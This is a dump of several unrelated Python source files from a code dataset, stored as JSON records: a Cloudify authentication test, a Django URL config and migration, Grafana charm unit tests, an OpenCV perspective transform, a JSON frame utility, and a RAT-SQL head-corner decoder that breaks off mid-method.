'source': CUSTOM_AUTH_PROVIDER_PLUGIN\n }\n }\n\n def get_authentication_providers_list(self):\n return [\n {\n 'implementation': 'mock_auth_provider_with_no_userstore'\n '.auth_without_userstore:AuthorizeUser1',\n 'name': 'password',\n 'properties': {\n 'dummy_param': 'dumdum'\n }\n }\n ]\n\n def get_userstore_drive(self):\n return ''\n\n def _assert_unauthorized_user_fails(self):\n client = CloudifyClient(host=self.env.management_ip,\n headers=util.get_auth_header(username='user2',\n password='pass2'))\n self.assertRaisesRegexp(CloudifyClientError, '401: user unauthorized',\n client.manager.get_status)\n","sub_path":"cosmo_tester/test_suites/test_security/no_userstore_tests.py","file_name":"no_userstore_tests.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218634368","text":"# Author: Aaditya Maheshwari\n# Version: 0.0.1\n# File_name: longest_word.py\n\n# Copyright 2016 Aaditya Maheshwari\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing 
permissions and\n# limitations under the License.\nimport doctest\n\n\ndef longest_word(sentence):\n \"\"\"\n Prints the longest word in a sentence.\n >>> longest_word(\"Python is amazing\")\n amazing\n >>> longest_word(\"Python is cool\")\n Python\n >>> longest_word(\"I am the best not you\")\n best\n \"\"\"\n\n words = sentence.split(\" \")\n long_word = None\n word_idx = 0\n while word_idx < len(words):\n current_word = words[word_idx]\n\n if long_word is None:\n long_word = current_word\n elif len(long_word) < len(current_word):\n long_word = current_word\n word_idx += 1\n print(long_word)\n\nif __name__ == '__main__':\n user_input = input(\"Please enter a sentence/text: \")\n longest_word(user_input)\n doctest.testmod()\n","sub_path":"longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181654341","text":"from django.conf.urls import url\nfrom django.urls import path , include\nfrom django.views.decorators.csrf import csrf_exempt\nfrom . import views\n\nurlpatterns = [\n path('', views.LeadListCreate.as_view()),\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.jwt')),\n path('<int:pk>/', views.DetailLead.as_view()),\n path('share', views.ShareView.as_view()),\n path('getAllDomains', views.SearchMultipledomain.as_view()),\n path('testSharing', views.TestSharingView.as_view()),\n path('updateJsonFile', views.UpdateJsonFile.as_view()),\n path('downloadEmails', views.DownloadEmailInCsv.as_view()),\n path('findervalidEmail', views.CreateEmailView.as_view()),\n]\n\n","sub_path":"Generation_2_lead/example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543696438","text":"import json\nimport re\nimport PublicLib.public as pfun\nimport time\n\ng_cnt = 0\n\n\ndef subStrToJson(data):\n if data == None:\n return False, None\n # 原因在于:字符串里用单引号来标识字符\n data = re.sub('\\'', '\\\"', data)\n data = re.sub('\\n', '', data)\n\n # 字符串 转 json\n try:\n data_json = json.loads(data)\n if not IsJsonFrame(data_json):\n return False, 'Error_Json'\n except:\n print(data)\n return False, data\n # addr = data_json['DataValue']['04A20208']\n # print(addr)\n return True, data_json\n\n\n# 自定义 json 格式判断\ndef IsJsonFrame(dictdata):\n if dictdata is None:\n return False\n\n if isinstance(dictdata, dict) is False:\n return False\n\n dictlist = ['Len', 'Cmd', 'SN', 'DataTime', 'CRC', 'DataValue']\n for k in dictlist:\n if k not in dictdata:\n return False\n return True\n\n\n# dict recv, dict send\n# dict expect answer\n# answer\n# answer result\n# int threshold\ndef JsonDealFrame(recvframe, senddata, answer):\n answer['answerresult'] = {}\n if not IsJsonFrame(recvframe) or not IsJsonFrame(senddata):\n answer['result'] = 'frame error'\n return\n\n # 接收帧 去除头部结构\n if \"recvData\" in recvframe:\n recvframe = recvframe[\"recvData\"]\n\n # 帧序号相同\n if recvframe['SN'] != senddata['SN']:\n answer['result'] = 'sn error'\n return\n\n # 控制字相同\n if recvframe['Cmd'] != senddata['Cmd']:\n answer['result'] = 'cmd error'\n return\n\n # 预估返回值相同\n threshold = answer['threshold']\n answer['answer'] = recvframe['DataValue'].copy()\n answer['answerresult'] = recvframe['DataValue'].copy()\n\n for i, j in recvframe['DataValue'].items():\n if i in answer['expectanswer']:\n # threshold 判断:\n # 0: 绝对相等\n # 1: 门限内相等\n # -1: 不判断\n if threshold == 0:\n if 
answer['expectanswer'][i] == j:\n answer['answerresult'][i] = 'ok'\n else:\n answer['answerresult'][i] = 'error'\n elif threshold == -1:\n answer['answerresult'][i] = 'ok'\n else:\n recvvalue = float(j)\n answervalue = float(answer['expectanswer'][i])\n if answervalue * (1 - threshold) <= recvvalue <= answervalue * (1 + threshold):\n answer['answerresult'][i] = 'ok'\n else:\n answer['answerresult'][i] = 'error'\n\n return\n\n\n# parm\n# key:cmd value:Read/Set/..\n# DataValue dict key1:value1 ... key n:value n\ndef JsonMakeFrame(parm):\n global g_cnt\n g_cnt = g_cnt + 1\n if g_cnt > 9999:\n g_cnt = 0\n\n if \"Cmd\" in parm and \"DataValue\" in parm:\n datatime = time.strftime(\"%y%m%d%H%M%S\", time.localtime())\n data = dict(Len=\"312\", Cmd=parm[\"Cmd\"], SN=str(g_cnt), DataTime=datatime, CRC=\"FFFF\", DataValue=parm[\"DataValue\"])\n\n # 计算CRC\n dv = str(parm[\"DataValue\"]).replace(' ', '')\n dv = \"0000\" + pfun.crc16str(0, dv[1:-1], False)\n data[\"CRC\"] = dv[-4:]\n\n # 计算��度\n data[\"Len\"] = str(len(str(data)) - 12)\n else:\n data = dict(frame = 'error')\n\n # 将python对象data转换json对象\n data_json = json.dumps(data, ensure_ascii=False)\n\n # 将json对象转换成python对象\n # data_python = json.loads(data_json)\n\n return data_json\n\n\n'''\ndef JsonMakeValue(DIlist):\n for i in DIlist:\n Value =\n'''\n\nif __name__ == '__main__':\n # 数据项和内容\n # DIList = ['05060101', '05060102', '05060103']\n # ValueList = ['000000.00', '123.14', '778899']\n DIList = ['04A00501']\n ValueList = ['594C#03#03BC#0001#0001CA910001CA5D0001C9F50001EAE30001BCC50001BC810001BCA10001C9CD0001C9A50001C97D0001AF130001C9550001C92D0001E8D30001C92B0001D4AB0000973D00006DC300000000000000000001E8C7000000000000000000000000000000000000000000000000000000000001C9290001CC670001F1F1200009A8']\n List = dict(zip(DIList, ValueList))\n\n MakeFramePara = {}\n MakeFramePara['Cmd'] = 'Set'\n MakeFramePara['DataValue'] = List\n\n # CRC16 IBM: E8FE\n\n # 元组转json\n # DIValue = json.loads(data_python)\n\n # json 转 字符串\n data_python = JsonMakeFrame(MakeFramePara)\n print(data_python)\n\n # 字符串 转 json\n data = json.loads(data_python)\n ret = IsJsonFrame(data)\n print(ret)\n if ret:\n # dict expect answer\n # answer\n # answer result\n # int threshold\n dictanswer = {'threshold': 0.1, 'expectanswer': List}\n JsonDealFrame(data, data, dictanswer)\n for k in dictanswer:\n print(dictanswer[k])\n\n List['05060102'] = '199.29'\n dictanswer = {'threshold': 0.1, 'expectanswer': List}\n JsonDealFrame(data, data, dictanswer)\n for k in dictanswer:\n print(dictanswer[k])\n\n # a = JsonParse(data)\n '''\n for key in a:\n print(key)\n # print(a.key())\n #for key in a.iterkeys():\n print(a.values())\n for value in a.values():\n print(value)\n '''\n","sub_path":"Protocol/ly_Json.py","file_name":"ly_Json.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"618242069","text":"\"\"\"\nAuthor : Kyungmin Lee (rekyungmin@gmail.com)\nDate : 05/19/2019\nDescrip: Perpective transform\n\"\"\"\n\nimport io\nfrom typing import Iterable\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\ndef _transform(img: np.ndarray, coordinates: np.ndarray) -> np.ndarray:\n square_width = max(np.linalg.norm(coordinates[0] - coordinates[1]),\n np.linalg.norm(coordinates[2] - coordinates[3]))\n square_height = max(np.linalg.norm(coordinates[0] - coordinates[3]),\n np.linalg.norm(coordinates[1] - coordinates[2]))\n\n dst_coordinates = np.array([\n [0, 0],\n [square_width, 0],\n [square_width, 
square_height],\n [0, square_height]\n ], dtype=np.float32)\n\n transformation_matrix = cv2.getPerspectiveTransform(coordinates, dst_coordinates)\n return cv2.warpPerspective(img, transformation_matrix, dsize=(square_width, square_height))\n\n\ndef transform(bin_img: bytes, img_fmt: str, coordinates: Iterable[int]) -> bytes:\n if len(coordinates) != 4:\n raise TypeError('4 coordinates are required')\n\n pil_img = Image.open(io.BytesIO(bin_img))\n cv2_img = cv2.cvtColor(np.array(pil_img), cv2.COLOR_RGB2BGR)\n np_coordinates = np.array(coordinates, dtype=np.float32)\n\n transformed = _transform(cv2_img, np_coordinates)\n return cv2.imencode('.' + img_fmt, transformed)[1].tobytes()\n\n\nif __name__ == '__main__':\n print(cv2.__version__) # 4.1.0\n print(np.__version__) # 1.16.3\n print(Image.__version__) # 6.0.0\n","sub_path":"perspective.py","file_name":"perspective.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548345910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Ad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create time')),\n ('hits', models.PositiveIntegerField(default=0, verbose_name='Hits', blank=True)),\n ('title', models.CharField(max_length=500, verbose_name='Title')),\n ('description', models.TextField(verbose_name='Description')),\n ('author', models.ForeignKey(default=None, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-pk'],\n 'verbose_name': 'ad',\n 'verbose_name_plural': 'ads',\n },\n ),\n migrations.CreateModel(\n name='AdUserHit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(auto_now_add=True)),\n ('ad', models.ForeignKey(to='ads.Ad')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-pk'],\n },\n ),\n ]\n","sub_path":"ads/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"173579603","text":"# Copyright 2020 Ryan Barry\n# See LICENSE file for licensing details.\n\nimport hashlib\nimport unittest\nimport yaml\nimport json\n\nfrom unittest.mock import patch\nfrom ops.testing import Harness\nfrom charm import GrafanaCharm\n\nMINIMAL_CONFIG = {\"grafana-image-path\": \"grafana/grafana\", \"port\": 3000}\n\nMINIMAL_DATASOURCES_CONFIG = {\n \"apiVersion\": 1,\n \"datasources\": [],\n \"deleteDatasources\": [],\n}\n\nBASIC_DATASOURCES = [\n {\n \"access\": \"proxy\",\n \"isDefault\": \"false\",\n \"name\": \"juju_test-model_abcdef_prometheus_0\",\n \"orgId\": \"1\",\n \"type\": \"prometheus\",\n \"url\": \"http://1.2.3.4:1234\",\n }\n]\n\nSOURCE_DATA = {\n \"model\": \"test-model\",\n \"model_uuid\": \"abcdef\",\n \"application\": \"prometheus\",\n \"type\": \"prometheus\",\n}\n\nDASHBOARD_CONFIG = {\n \"apiVersion\": 1,\n \"providers\": [\n {\n \"name\": \"Default\",\n \"type\": \"file\",\n \"options\": {\"path\": \"dashboards\"},\n }\n 
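# a single file-based provider entry, following Grafana's dashboard provisioning schema\n    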
],\n}\n\n\nDB_CONFIG = {\n \"type\": \"mysql\",\n \"host\": \"1.1.1.1:3306\",\n \"name\": \"mysqldb\",\n \"user\": \"grafana\",\n \"password\": \"grafana\",\n}\n\n\nDATABASE_CONFIG_INI = \"\"\"[database]\ntype = mysql\nhost = 1.1.1.1:3306\nname = mysqldb\nuser = grafana\npassword = grafana\nurl = mysql://grafana:grafana@1.1.1.1:3306/mysqldb\n\n\"\"\"\n\n\ndef datasource_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict\n\n\ndef dashboard_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict\n\n\ndef global_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict[\"global\"]\n\n\ndef cli_arg(plan, cli_opt):\n plan_dict = plan.to_dict()\n args = plan_dict[\"services\"][\"grafana\"][\"command\"].split()\n for arg in args:\n opt_list = arg.split(\"=\")\n if len(opt_list) == 2 and opt_list[0] == cli_opt:\n return opt_list[1]\n if len(opt_list) == 1 and opt_list[0] == cli_opt:\n return opt_list[0]\n return None\n\n\nclass TestCharm(unittest.TestCase):\n def setUp(self):\n self.harness = Harness(GrafanaCharm)\n self.addCleanup(self.harness.cleanup)\n self.harness.begin()\n\n self.minimal_datasource_hash = hashlib.sha256(\n str(yaml.dump(MINIMAL_DATASOURCES_CONFIG)).encode(\"utf-8\")\n ).hexdigest()\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_datasource_config_is_updated_by_raw_grafana_source_relation(self, push):\n self.harness.set_leader(True)\n\n # check datasource config is updated when a grafana-source joins\n rel_id = self.harness.add_relation(\"grafana-source\", \"prometheus\")\n self.harness.update_relation_data(\n rel_id, \"prometheus\", {\"grafana_source_data\": json.dumps(SOURCE_DATA)}\n )\n self.harness.add_relation_unit(rel_id, \"prometheus/0\")\n self.harness.update_relation_data(\n rel_id, \"prometheus/0\", {\"grafana_source_host\": \"1.2.3.4:1234\"}\n )\n\n config = push.call_args[0]\n self.assertEqual(\n datasource_config(config).get(\"datasources\"), BASIC_DATASOURCES\n )\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_datasource_config_is_updated_by_grafana_source_removal(self, push):\n self.harness.set_leader(True)\n\n rel_id = self.harness.add_relation(\"grafana-source\", \"prometheus\")\n self.harness.update_relation_data(\n rel_id, \"prometheus\", {\"grafana_source_data\": json.dumps(SOURCE_DATA)}\n )\n self.harness.add_relation_unit(rel_id, \"prometheus/0\")\n self.harness.update_relation_data(\n rel_id, \"prometheus/0\", {\"grafana_source_host\": \"1.2.3.4:1234\"}\n )\n\n config = push.call_args[0]\n self.assertEqual(\n datasource_config(config).get(\"datasources\"), BASIC_DATASOURCES\n )\n\n rel = self.harness.charm.framework.model.get_relation(\"grafana-source\", rel_id)\n self.harness.charm.on[\"grafana-source\"].relation_departed.emit(rel)\n\n config = push.call_args[0]\n self.assertEqual(datasource_config(config).get(\"datasources\"), [])\n self.assertEqual(\n datasource_config(config).get(\"deleteDatasources\"),\n [{\"name\": \"juju_test-model_abcdef_prometheus_0\", \"orgId\": 1}],\n )\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_config_is_updated_with_database_relation(self, push):\n self.harness.set_leader(True)\n\n rel_id = self.harness.add_relation(\"database\", \"mysql\")\n self.harness.add_relation_unit(rel_id, \"mysql/0\")\n self.harness.update_relation_data(\n rel_id,\n \"mysql\",\n DB_CONFIG,\n )\n\n config = push.call_args_list[0][0][1]\n 
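# the second positional argument of the first push() call is the written config content\n        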
self.assertEqual(config, DATABASE_CONFIG_INI)\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_dashboard_path_is_initialized(self, push):\n self.harness.set_leader(True)\n\n self.harness.charm.init_dashboard_provisioning(\"dashboards\")\n\n config = push.call_args[0]\n self.assertEqual(dashboard_config(config), DASHBOARD_CONFIG)\n","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333844279","text":"import collections\nimport collections.abc\nimport copy\nimport csv\nimport itertools\nimport json\nimport os\n\nimport attr\nimport entmax\nimport enum\nimport torch\nimport torch.nn.functional as F\n\nfrom ratsql.models import abstract_preproc\nfrom ratsql.models import attention\nfrom ratsql.models import variational_lstm\nfrom ratsql.models.nl2code.decoder import NL2CodeDecoderPreproc\nfrom ratsql.models.head_corner.infer_tree_traversal import InferenceTreeTraversal\nfrom ratsql.models.head_corner.train_tree_traversal import TrainTreeTraversal\nfrom ratsql.models.head_corner.tree_traversal import TreeTraversal\nfrom ratsql.utils import registry\nfrom ratsql.utils import serialization\nfrom ratsql.utils import vocab\n\n\ndef lstm_init(device, num_layers, hidden_size, *batch_sizes):\n init_size = batch_sizes + (hidden_size,)\n if num_layers is not None:\n init_size = (num_layers,) + init_size\n init = torch.zeros(*init_size, device=device)\n return (init, init)\n\n\ndef maybe_stack(items, dim=None):\n to_stack = [item for item in items if item is not None]\n if not to_stack:\n return None\n elif len(to_stack) == 1:\n return to_stack[0].unsqueeze(dim)\n else:\n return torch.stack(to_stack, dim)\n\n\ndef accumulate_logprobs(d, keys_and_logprobs):\n for key, logprob in keys_and_logprobs:\n existing = d.get(key)\n if existing is None:\n d[key] = logprob\n else:\n d[key] = torch.logsumexp(\n torch.stack((logprob, existing), dim=0),\n dim=0)\n\n\ndef get_field_presence_info(ast_wrapper, node, field_infos):\n present = []\n for field_info in field_infos:\n field_value = node.get(field_info.name)\n is_present = field_value is not None and field_value != []\n\n maybe_missing = field_info.opt or field_info.seq\n is_builtin_type = field_info.type in ast_wrapper.primitive_types\n\n if maybe_missing and is_builtin_type:\n # TODO: make it possible to deal with \"singleton?\"\n present.append(is_present and type(field_value).__name__)\n elif maybe_missing and not is_builtin_type:\n present.append(is_present)\n #elif not maybe_missing and field_info.type in [\"table\", \"column\"]: ## added this condition...\n # assert is_present\n # present.append(True)\n elif not maybe_missing and is_builtin_type:\n present.append(type(field_value).__name__)\n elif not maybe_missing and not is_builtin_type:\n assert is_present\n present.append(True)\n return tuple(present)\n\n\ndef rule_match(string_lhs, rule_string, rule):\n \"\"\" Check if string '->' rule form matches with a rule \"\"\"\n if isinstance(rule[1], str):\n return rule_string == rule[0]+\" -> \"+rule[1]+\"/NULL\"\n elif isinstance(rule[1], tuple):\n return string_lhs == rule[0]\n else:\n return string_lhs == rule[0]\n\n\ndef get_rule_string_from_node(node_type, child_node, ast_wrapper):\n if isinstance(child_node, list):\n return node_type, len(child_node)\n elif node_type in ast_wrapper.product_types:\n return None\n elif not node_type:\n return None\n else:\n return node_type, 
child_node[\"_type\"]\n\n\n@attr.s\nclass PredictPreterminal:\n ttype = attr.ib()\n goal_type = attr.ib()\n\n def __dict__(self):\n return {\"ttype\": self.ttype,\n \"goal_type\": self.goal_type,\n \"class\": \"PredictPreterminal\"}\n\n@attr.s\nclass ExpandUp:\n rule = attr.ib()\n goal_type = attr.ib()\n\n def __dict__(self):\n return {\"rule\": self.rule,\n \"goal_type\": self.goal_type,\n \"class\": \"ExpandUp\"}\n\n@attr.s\nclass Point:\n ttype = attr.ib()\n value = attr.ib()\n\n def __dict__(self):\n return {\"value\": self.value,\n \"ttype\": self.ttype,\n \"class\": \"Point\"}\n\n\n\ndef get_rule_match_indices(string_lhs, rule_string, rule_index):\n return [rule_index[rule] for rule in rule_index if rule_match(string_lhs, rule_string, rule)]\n\n@registry.register('decoder', 'HeadCorner')\nclass HeadCornerDecoder(torch.nn.Module):\n Preproc = NL2CodeDecoderPreproc\n\n class Handler:\n handlers = {}\n\n @classmethod\n def register_handler(cls, func_type):\n if func_type in cls.handlers:\n raise RuntimeError(f\"{func_type} handler is already registered\")\n\n def inner_func(func):\n cls.handlers[func_type] = func.__name__\n return func\n\n return inner_func\n\n class State(enum.Enum):\n EXPAND_UP = 0\n PREDICT_HEAD_CORNER = 1\n POINT = 2\n\n def __init__(\n self,\n device,\n preproc,\n grammar_path,\n rule_emb_size=128,\n node_embed_size=64,\n # TODO: This should be automatically inferred from encoder\n enc_recurrent_size=256,\n recurrent_size=256,\n dropout=0.,\n desc_attn='bahdanau',\n copy_pointer=None,\n multi_loss_type='logsumexp',\n sup_att=None,\n use_align_mat=False,\n use_align_loss=False,\n enumerate_order=False,\n loss_type=\"softmax\"):\n super().__init__()\n self._device = device\n self.preproc = preproc\n self.ast_wrapper = preproc.ast_wrapper\n self.terminal_vocab = preproc.vocab\n self.preproc.primitive_types.append(\"singleton\")\n\n if self.preproc.use_seq_elem_rules:\n self.node_type_vocab = vocab.Vocab(\n sorted(self.preproc.primitive_types) +\n sorted(self.ast_wrapper.custom_primitive_types) +\n sorted(self.preproc.sum_type_constructors.keys()) +\n sorted(self.preproc.field_presence_infos.keys()) +\n sorted(self.preproc.seq_lengths.keys()),\n special_elems=())\n else:\n self.node_type_vocab = vocab.Vocab(\n sorted(self.preproc.primitive_types) +\n sorted(self.ast_wrapper.custom_primitive_types) +\n sorted(self.ast_wrapper.sum_types.keys()) +\n sorted(self.ast_wrapper.singular_types.keys()) +\n sorted(self.preproc.seq_lengths.keys()),\n special_elems=())\n\n self.all_rules, self.rules_index, self.parent_to_preterminal, self.preterminal_mask, self.preterminal_debug, \\\n self.preterminal_types, self.parent_to_hc, self.hc_table, self.hc_debug, self.parent_to_head, \\\n self.parent_to_rule = self.compute_rule_masks(grammar_path)\n\n\n # json.dump(dict(self.parent_to_preterminal), open('data/spider/head-corner-glove,cv_link=true/p.json'))\n #json.dump({\"parent_to_preterminal\": dict(self.parent_to_preterminal),\n # \"preterminal_mask\": dict(self.preterminal_mask),\n # \"parent_to_hc\": {key: sorted(list(self.parent_to_hc[key])) for key in self.parent_to_hc},\n # \"hc_table\": {key: dict(self.hc_table[key]) for key in self.hc_table},\n # \"parent_to_head\": dict(self.parent_to_head),\n # \"node_type_vocab_e2i\": dict(self.node_type_vocab.elem_to_id),\n # \"node_type_vocab_i2e\": dict(self.node_type_vocab.id_to_elem),\n # # \"terminal_vocab\": self.terminal_vocab,\n # # \"rules_index\": self.rules_index,\n # \"parent_to_rule\": dict(self.parent_to_rule),\n # },\n # 
open('data/spider/head-corner-glove,cv_link=true/head_corner_elems.json', 'w'))\n\n self.rule_emb_size = rule_emb_size\n self.node_emb_size = node_embed_size\n self.enc_recurrent_size = enc_recurrent_size\n self.recurrent_size = recurrent_size\n\n self.use_align_mat = use_align_mat\n self.use_align_loss = use_align_loss\n self.enumerate_order = enumerate_order\n\n if use_align_mat:\n from ratsql.models.spider import spider_dec_func\n self.compute_align_loss = lambda *args: \\\n spider_dec_func.compute_align_loss(self, *args)\n self.compute_pointer_with_align = lambda *args: \\\n spider_dec_func.compute_pointer_with_align_head_corner(self, *args)\n\n self.state_update = variational_lstm.RecurrentDropoutLSTMCell(\n input_size=self.rule_emb_size * 2 + self.enc_recurrent_size + self.recurrent_size * 2 + self.node_emb_size,\n hidden_size=self.recurrent_size,\n dropout=dropout)\n\n self.attn_type = desc_attn\n if desc_attn == 'bahdanau':\n self.desc_attn = attention.BahdanauAttention(\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size,\n proj_size=50)\n elif desc_attn == 'mha':\n self.desc_attn = attention.MultiHeadedAttention(\n h=8,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n elif desc_attn == 'mha-1h':\n self.desc_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n elif desc_attn == 'sep':\n self.question_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n self.schema_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n else:\n # TODO: Figure out how to get right sizes (query, value) to module\n self.desc_attn = desc_attn\n self.sup_att = sup_att\n self.rule_logits = torch.nn.Sequential(\n torch.nn.Linear(self.recurrent_size, self.rule_emb_size),\n torch.nn.Tanh(),\n torch.nn.Linear(self.rule_emb_size, len(self.rules_index)))\n self.rule_embedding = torch.nn.Embedding(\n num_embeddings=len(self.rules_index),\n embedding_dim=self.rule_emb_size)\n\n self.gen_logodds = torch.nn.Linear(self.recurrent_size, 1)\n self.terminal_logits = torch.nn.Sequential(\n torch.nn.Linear(self.recurrent_size, self.rule_emb_size),\n torch.nn.Tanh(),\n torch.nn.Linear(self.rule_emb_size, len(self.terminal_vocab)))\n self.terminal_embedding = torch.nn.Embedding(\n num_embeddings=len(self.terminal_vocab),\n embedding_dim=self.rule_emb_size)\n if copy_pointer is None:\n self.copy_pointer = attention.BahdanauPointer(\n query_size=self.recurrent_size,\n key_size=self.enc_recurrent_size,\n proj_size=50)\n else:\n # TODO: Figure out how to get right sizes (query, key) to module\n self.copy_pointer = copy_pointer\n if multi_loss_type == 'logsumexp':\n self.multi_loss_reduction = lambda logprobs: -torch.logsumexp(logprobs, dim=1)\n elif multi_loss_type == 'mean':\n self.multi_loss_reduction = lambda logprobs: -torch.mean(logprobs, dim=1)\n\n self.pointers = torch.nn.ModuleDict()\n self.pointer_action_emb_proj = torch.nn.ModuleDict()\n for pointer_type in self.preproc.grammar.pointers:\n self.pointers[pointer_type] = attention.ScaledDotProductPointer(\n query_size=self.recurrent_size,\n key_size=self.enc_recurrent_size)\n self.pointer_action_emb_proj[pointer_type] = torch.nn.Linear(\n self.enc_recurrent_size, self.rule_emb_size)\n\n self.node_type_embedding = torch.nn.Embedding(\n num_embeddings=len(self.node_type_vocab),\n embedding_dim=self.node_emb_size)\n\n # TODO 
batching\n self.zero_rule_emb = torch.zeros(1, self.rule_emb_size, device=self._device)\n self.zero_recurrent_emb = torch.zeros(1, self.recurrent_size, device=self._device)\n if loss_type == \"softmax\":\n self.xent_loss = torch.nn.CrossEntropyLoss(reduction='none')\n elif loss_type == \"entmax\":\n self.xent_loss = entmax.entmax15_loss\n elif loss_type == \"sparsemax\":\n self.xent_loss = entmax.sparsemax_loss\n elif loss_type == \"label_smooth\":\n self.xent_loss = self.label_smooth_loss\n\n self.goals = None\n self.head_corners = None\n self.operation = None\n\n def label_smooth_loss(self, X, target, smooth_value=0.1):\n if self.training:\n logits = torch.log_softmax(X, dim=1)\n size = X.size()[1]\n one_hot = torch.full(X.size(), smooth_value / (size - 1)).to(X.device)\n one_hot.scatter_(1, target.unsqueeze(0), 1 - smooth_value)\n loss = F.kl_div(logits, one_hot, reduction=\"batchmean\")\n return loss.unsqueeze(0)\n else:\n return torch.nn.functional.cross_entropy(X, target, reduction=\"none\")\n\n @classmethod\n def _calculate_rules(cls, preproc):\n offset = 0\n\n all_rules = []\n rules_mask = {}\n\n # Rules of the form:\n # expr -> Attribute | Await | BinOp | BoolOp | ...\n # expr_seq_elem -> Attribute | Await | ... | Template1 | Template2 | ...\n for parent, children in sorted(preproc.sum_type_constructors.items()):\n assert parent not in rules_mask\n rules_mask[parent] = (offset, offset + len(children))\n offset += len(children)\n all_rules += [(parent, child) for child in children]\n\n # Rules of the form:\n # FunctionDef\n # -> identifier name, arguments args\n # | identifier name, arguments args, stmt* body\n # | identifier name, arguments args, expr* decorator_list\n # | identifier name, arguments args, expr? returns\n # ...\n # | identifier name, arguments args, stmt* body, expr* decorator_list, expr returns\n for name, field_presence_infos in sorted(preproc.field_presence_infos.items()):\n assert name not in rules_mask\n rules_mask[name] = (offset, offset + len(field_presence_infos))\n offset += len(field_presence_infos)\n all_rules += [(name, presence) for presence in field_presence_infos]\n\n # Rules of the form:\n # stmt* -> stmt\n # | stmt stmt\n # | stmt stmt stmt\n for seq_type_name, lengths in sorted(preproc.seq_lengths.items()):\n assert seq_type_name not in rules_mask\n rules_mask[seq_type_name] = (offset, offset + len(lengths))\n offset += len(lengths)\n all_rules += [(seq_type_name, i) for i in lengths]\n\n return all_rules, rules_mask\n\n def compute_rule_masks(self, grammar_path):\n\n # paths for head-corner settings\n path_to_preterminals = os.path.join(grammar_path, \"preterminals.csv\")\n path_to_head_map = os.path.join(grammar_path, \"rule_to_head.csv\")\n\n # goal to preterminals\n preterminal_map = {}\n preterminal_masks = {}\n preterminal_debug = {}\n preterminal_types = set()\n with open(path_to_preterminals, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for goal, prets in elems:\n prets = set([s.strip() for s in prets.strip().split(\",\") if s != \"\"])\n preterminal_types = preterminal_types.union(prets)\n\n all_rules = list(self.preproc.all_rules + tuple([(\"\", \"**MATCH**\")]) + tuple([(\"\", p) for p in preterminal_types]))\n rules_index = {v: idx for idx, v in enumerate(all_rules)}\n\n with open(path_to_preterminals, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for goal, prets in elems:\n prets = [s.strip() for s in prets.strip().split(\",\") if s != \"\"]\n mask_ids = sorted([rules_index[(\"\", p)] for p in prets])\n 
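# keep the raw names, a sorted index mask, and a set for O(1) membership checks\n                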
